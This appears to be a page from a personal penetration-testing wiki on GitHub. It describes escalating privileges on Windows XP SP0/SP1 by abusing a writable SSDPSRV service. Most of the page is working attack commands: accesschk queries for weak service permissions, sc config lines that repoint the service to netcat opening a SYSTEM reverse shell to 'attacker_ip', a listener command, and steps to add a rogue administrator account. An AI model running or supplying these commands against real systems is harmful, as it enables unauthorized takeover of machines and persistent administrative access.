Skip to content

EoP for WinXP SP0, SP1

lethanhtung01011980 edited this page Oct 9, 2019 · 6 revisions

Notes

  • Use accesschk to check services with RW access
  • Either upnphost or SSDPSRV

Put accesschk to victim

  • cd C:\Inetpub\wwwroot\winxp

Check for insecure services

  • accesschk users -cw * /accepteula
  • accesschk.exe -uwcqv "Authenticated Users" * /accepteula
  • accesschk users -cuwcqv * /accepteula

Change sc to create reverse shell to attacker

  • sc config SSDPSRV binpath= "C:\Inetpub\wwwroot\nc.exe -nv attacker_ip 9988 -e C:\WINDOWS\System32\cmd.exe"
  • sc config SSDPSRV depend= ""
  • sc config SSDPSRV obj= ".\LocalSystem" password= ""
  • sc qc SSDPSRV
  • sc config SSDPSRV start= auto
  • net start SSDPSRV

Listen on attacker

  • nc -nlvp 9988

Attacker to execute exe to create new admin user

  • Create c files to create new admin user
  • Convert c files to exe files
  • Run C:\Inetpub\wwwroot\addnewuser.exe
  • Run C:\Inetpub\wwwroot\addusertoAdmin.exe

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally